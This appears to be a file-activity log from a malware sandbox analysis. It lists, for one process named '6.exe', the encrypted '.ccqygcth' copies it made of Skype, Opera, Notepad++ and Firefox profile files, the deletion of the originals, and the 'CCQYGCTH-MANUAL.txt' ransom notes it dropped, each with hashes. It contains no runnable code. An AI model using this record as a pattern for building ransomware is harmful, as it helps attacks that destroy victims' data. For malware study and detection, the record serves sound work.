C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db.ccqygcth
binary
MD5: 659f29158ff2491d54090bfb63c6ae5c
SHA256: 4128b35dbed5010dd856576f70ffe0c7c1d07be8eb80251c91b10aa80cdf8fec
2804
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared.xml.ccqygcth
binary
MD5: fb0239976eb95a35d73fbe3ea734c7a4
SHA256: 91098c7ae1dd759eb2c9eb8ed50eb337ad6dfbedc35b50870ff009112627973f
2804
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data.ccqygcth
binary
MD5: 948cac1005364dca666828beca586710
SHA256: 53e28a4e816982f30dedb9ff3fddb601da97d72fe172527d527e98528a80f983
2804
6.exe
C:\Users\admin\AppData\Roaming\Skype\logs\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Skype\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml.ccqygcth
binary
MD5: ab5a7d4de52186858f1791e8f332aab0
SHA256: db9ba791758d03699fd5f8ea3594594167a17e88cf6530d2bc0cb7eac0262fd6
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat.ccqygcth
binary
MD5: 82a3d6b04414e0922afcd3add6c655d8
SHA256: 15a754729fc9c0e9ab0ec12224b06fef862ebaf811ffedceeac155b1332b321c
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat.ccqygcth
binary
MD5: 6303dac91170c6343a0ab2e12e27153c
SHA256: 281c3214aca077c9d40f82fbeb85f93a9de1e9b3fc93fff17d28b954a26ebe44
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml.ccqygcth
binary
MD5: 5e07dfcfb09e917b9b594dca6f4bec10
SHA256: cfa836d94db02e7586b7eec4e453658deda46ecf3b77f9a6092a80f1d4fb528d
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini.ccqygcth
binary
MD5: 00216173a2c28c02dc313e599cd6e012
SHA256: 462d98360a704408804c152d22c915a2fa12752558c0eece9ce7330c7a747963
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml.ccqygcth
binary
MD5: d2b58d98c46af0e87123db083d831fe4
SHA256: 90f456f8d7028759e208882948525001fb69f42edcdf7c2b382f4bf6caaa3241
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css.ccqygcth
binary
MD5: cb0d3bb99cf7732eb0c38673eadc35f6
SHA256: 691024e4ac5d7063f45b2b42fb10a7040c6edfeabb40f1e088621eb27d07a99b
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css.ccqygcth
binary
MD5: f06e1f8efb83805b0b14efb5355c764d
SHA256: 8f209297b474811209cf61425054dd6879abcfc4a4b7b3c1409abbd8498f29da
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css.ccqygcth
binary
MD5: 2a2abf00a8d26ec907dea6c12f3bc905
SHA256: a1a4495452ebc133fd9b02147fc4b80a74481def00e2b7bd29917199332393b6
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css.ccqygcth
binary
MD5: bb4cff5014639d7fbf1fe1a5429d0ec4
SHA256: f3b5cd34965d0e03a0d70b6765263bbd64d5c21ef11f2df98211356377b4947a
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css.ccqygcth
binary
MD5: 5cabd77943cdeed458449508b840e315
SHA256: b3f30a3879a2421bb98698b221f7c807b37c75c44582d42b11296f1870ed0ed9
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css.ccqygcth
binary
MD5: ab23d7dd7d868986b6489df950339f1e
SHA256: 7033f3d08739c3f77a2fefcb8ab89c26746740e61082980ea410c3ad756302aa
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css.ccqygcth
binary
MD5: d59a149d3f53f679585956c1e802a2a6
SHA256: 8da727f14269d6cb5c707124b46faed0efe0d192552b055c747b7e415d5224e0
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css.ccqygcth
binary
MD5: e64e05a9d8e32b02b2d7214febd7c091
SHA256: 60658943a100e1b0be615680a34c581a6fb512e801dc1a4bcaedaef4c184d3a2
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css.ccqygcth
binary
MD5: 7ac206df9cc94094480e67676a8a8093
SHA256: 41a861e09576d98a142c6c40283913b65df00e16b6f95a15fd289e853f6b0df5
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css.ccqygcth
binary
MD5: 293b063f042309a46d918ce03ff5da6f
SHA256: 532ec12f9123d58ac52babd232ee9c4a5e4fb9160d3abcf5993d796fe44106bf
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css.ccqygcth
binary
MD5: a05e3a411b476a1a348211357a7f8974
SHA256: 6fc950278fcad8fb7880a6a99c2ee1bc39c1f817cc985e122f2b23d85b6a3b68
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css.ccqygcth
binary
MD5: 6eab243aa66c476bbdea8e0b20c1f3b7
SHA256: 55629d2e9d90a03a737397f22cc9d4e1d3c601c2b1106d65b4abf22f1df7a982
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css.ccqygcth
binary
MD5: 09584bbbf3609087979246476d28f341
SHA256: e3eccce62003b8234390c3c497756b939c14e3203cd36559341d01d2e0f36e9f
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css.ccqygcth
binary
MD5: f222d51b7312a90869e9b160b659dc36
SHA256: 62d0d054eab688e3ea8862af58835a1027b05fd6880fac8d5165ec0d37ac0afc
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css.ccqygcth
binary
MD5: 353fcfac2aaadd2c9faa31039f800580
SHA256: 65780feb9104aa76513b61268b3186a43b6705ced9edb779dd9fd8fdb91f994b
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css.ccqygcth
binary
MD5: cb4e324f7186cf475213ac2e3a1d5e2d
SHA256: e258c95d79c1141ccab6f373bead6e865bef5b6eb8410af00f4a9f236480778f
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini.ccqygcth
binary
MD5: ab85e53da89f541e7e458c0038ca3dc4
SHA256: 071fb2699e74c85418373e5958f444f5a9650ff59021429feed9b5b41b67b822
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak.ccqygcth
binary
MD5: c1e10386d2c8cc0b1374cec18dc4244a
SHA256: 96076ec020bf44af43519749ea9d17c1434de6c8b955b2c19543f784b61632ee
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.ccqygcth
binary
MD5: 948b406ee046beae9c101184afed529c
SHA256: 865dda21f51f257750d016b94bdefa678ddbde9162bbc73d3731607e90857af6
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat.ccqygcth
binary
MD5: cc56bd22dacd11cb3d7119b9b931ed67
SHA256: 0fe714c58efdef4bcf22ce8a52fd22977e67a322218700ecb31be31d879166e5
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat.ccqygcth
binary
MD5: 4cf9b36e2f67d3dbc61f47b2df488292
SHA256: 6f0934feb19a09a5be6ec234f0e0899530df491109519a9f92e630a7f47cb49d
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat.ccqygcth
binary
MD5: fb34bb57543645912ac679f06e99cbd3
SHA256: d3cf8f9cad26b0c2a6ad1dc5ca1885152c27523830fb7909e9b1c4f2ae6cf09d
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat.ccqygcth
binary
MD5: ba2993c8cb915a4d4bbf9f2b739363f3
SHA256: a29d13f187fba4256c97d866bf4e9e6d14243f16212bc535d4c2cc013520bda3
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat.ccqygcth
binary
MD5: a7d8cf6de0cf83ea9d7ced0a300565f2
SHA256: f2f7b34a01def3f90ebf1d3007ea1b07715dab6729c013c96ccba317a1610a34
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat.ccqygcth
binary
MD5: 25a9a97833d5ba2ea7f7846c32ee52c5
SHA256: af839c256c7224352e648ea81d17a2a49d7e45ed8314a706b3190509aa47531f
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat.ccqygcth
binary
MD5: 5de782783e2d8d3f3ad099fb727523b9
SHA256: d710f140d502781bfe993584f738840154f88d11f91e63af5f7a9bd60439e62a
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini.ccqygcth
binary
MD5: f72bc96b76b26ff827782439354d6e65
SHA256: 6ebe759c1bc1f9e8a283cd2f2d95f7bd865ce590d3344107d34661b46a36238b
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat.ccqygcth
binary
MD5: 9a8afd0326139183870101d42bc5e0e9
SHA256: 8a65b2be64fc8c5a7d56ec31612c5af4b3a24b285b4cd59e8d60e31155382f6c
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini.ccqygcth
binary
MD5: 6c2c195adfd894b36c1d1dbc9edffaa0
SHA256: 11c51b4809b2b64942beee9165ac0cd3d8957dbe4aad8fcc1a6a4d6c15b1269f
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat.ccqygcth
binary
MD5: 84e46f04616698205f062f4ac2dc16d2
SHA256: 771f3952b429452a18e667c80d0ddd4734ce81f15b527ad6c71ebe0546816389
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat.ccqygcth
binary
MD5: 66df9c8a604ba5966b80f153a17620ac
SHA256: d08fcc5bd666ed298f1548ea56f12e533a8f243756046ea35a4f5bac008aefc3
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat.ccqygcth
binary
MD5: b6f380250f63429b7d7072c3c81e5ad1
SHA256: c7a78491a888f150e57afb6c9bced978eae8123ef3492b1f86a9ffdcf689e4e2
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr.ccqygcth
pgc
MD5: 772bd0e09d124c682a92ee09e85e0917
SHA256: faf4e949f97ff50351559629662e93c7accf8e82412121ec151c93ee20abc75e
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml.ccqygcth
binary
MD5: 12136b8c4f6712fc133638f379dd22d8
SHA256: feb67d7618c3d62d5246d23100b03f0928cd777c304d86355bc554bf9d47a27c
2804
6.exe
C:\Users\admin\AppData\Roaming\Opera\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml.ccqygcth
binary
MD5: 46256ea80813ccf93148cb5d6849869f
SHA256: c9dcfbe2e165b4c32cc90ca6393ca118201192189b1acb01e27b21b5afb791be
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml.ccqygcth
binary
MD5: 395deec044e1077d5cacc59a50c1749a
SHA256: 31d06fe478c1a830929fa5376d5cd495a926cabf0fb2ea076aa47b7193a69590
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml.ccqygcth
binary
MD5: 6359f9a4a3542690da8c82ac9440f7af
SHA256: a6e573858bc450978449fb93e492b76c11ab36245b3fa866fd8b2fbaf309f3a4
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml.ccqygcth
ini
MD5: c54e47a84579b169bbe10d4a8a7046b4
SHA256: f635cbe637a08e5d22a06a0e0e2fc58a7d26f6e57ff4766335bc5a5e1c4b0957
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml.ccqygcth
binary
MD5: 283586593773364c80aa2887d280b7b1
SHA256: b5137ebefdf7e71740f3bfb8d8f458ee8d8d4e7f7544288926eacab315516247
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml.ccqygcth
binary
MD5: dd97c14f02e9e9219336fa3b744a9a02
SHA256: 20a655182b5e99dc9e5377047a1fbb459419d18b72a0c19aa387ddeed7f26d99
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml.ccqygcth
binary
MD5: 499118a53fcfb81e412c53914145931d
SHA256: c77e2673a5c7dc778977a5a05f1ba28973bb99a87e210b8321b7d4a868996583
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml.ccqygcth
binary
MD5: 05fdafb385e8fd1be9711f0bb05903cc
SHA256: 807093aa0363148aa2e514131de7f1ff0b512eb4a9b39db3010c68d501e29a75
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml.ccqygcth
binary
MD5: 072b88f7d69dc06a103a852c40f572c1
SHA256: aad934d17049d7d6147b56746de456636bc5f88a850496531a9e05405b411476
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml.ccqygcth
binary
MD5: 0fe1425fad17f8bde26061e143a8fdfa
SHA256: 54ce4ab44695b6ff43d1a1e87f1ebbc1dd2710f68655c3c3bb530160da64cce2
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml.ccqygcth
binary
MD5: 35be9332fc6132c8498857142bc617f8
SHA256: 89d9f89bfa0f5a4cb6de426c4ac3b10f3703ad1435650da0b28207eb77afc602
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml.ccqygcth
binary
MD5: 76881a1e1a312239ee45864f963a0b2c
SHA256: 6ec257ec2dc989855cec73627af9bcc38e40928dac6ef76e5d282e1e36e94047
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml.ccqygcth
binary
MD5: c87ab007c219ff848fe3f2f42951a585
SHA256: bf4f5566612872b74fd13dc0f84857e5603bcda654278bee06151e90b090e728
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml.ccqygcth
binary
MD5: e1dddccefbda68517fd1495b0fd09900
SHA256: 6bbc46992de47eccd3c67403c6f8a3bcfe7bcc0fcedb9068aa7bc6018ad83939
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml.ccqygcth
binary
MD5: d7e73f7cac1a2aac60b16d24a5a2c186
SHA256: 42ff9ff1efa0e881f89a74cb201e005ebe5b6fe3718700461316fd7fa459dcb1
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml.ccqygcth
binary
MD5: f28fd6f292852b7c1f2c5863d8d913e5
SHA256: ba70fdfa86588379b73c1c9b33cb899f96280f725737026ba84629614fa3be1d
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml.ccqygcth
binary
MD5: c698cec1ed994bc296354ea8ee63d9df
SHA256: 577c109fdfed84252a4d1b2f9331c7698682f27e45d58f9b65731680941a8111
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml.ccqygcth
binary
MD5: 9b5270d042885858f71e32ff3785e02f
SHA256: 2eb636923193fdd841c851e0341ece9b3bf4176ea5c0ce8a67e692b688ed575e
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml.ccqygcth
binary
MD5: 6fc1a2b751ccca0ac05111df34004862
SHA256: 079e05299fa3fdb6edde94368d86377b44c502e1d8a932ce0398dc12fbd5abf6
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml.ccqygcth
binary
MD5: 467688e86ce0c1143d428daf425e1fe0
SHA256: 745181575caa1b7de220f5402a4c20b6e74d6ebd1554fe3f894e85563d2f917d
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\config\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml.ccqygcth
binary
MD5: 257ee6d7c79c2f4846ff0e7e25605299
SHA256: 2db8e4f954fba2d4ee8eeb20c5e86acb79d8920646a9edb0e8a5f3f48fd2b7ff
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\SystemExtensionsDev\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini.ccqygcth
binary
MD5: 162d0684cd05ffc576628447f4c11e4f
SHA256: 01709d228139dab34ccaea89d7173b7cd0d9c0495285dc0a20199cdf215e76e4
2804
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json.ccqygcth
binary
MD5: 77b464c5b4ac7099af35ae01022d6493
SHA256: 8ddbe1aefae97007348b0881ce548565e15be016342fd6a4ca0ad0bbf1b86b8b
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite.ccqygcth
binary
MD5: 8e92c4b2d47876e91982cd19112b12aa
SHA256: 19269be8ec7a39758351029278c380aa94b314c2d47fe2b039871e399a6c4d69
2804
6.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite
––
MD5:  ––
SHA256:  ––
2804
6.exe
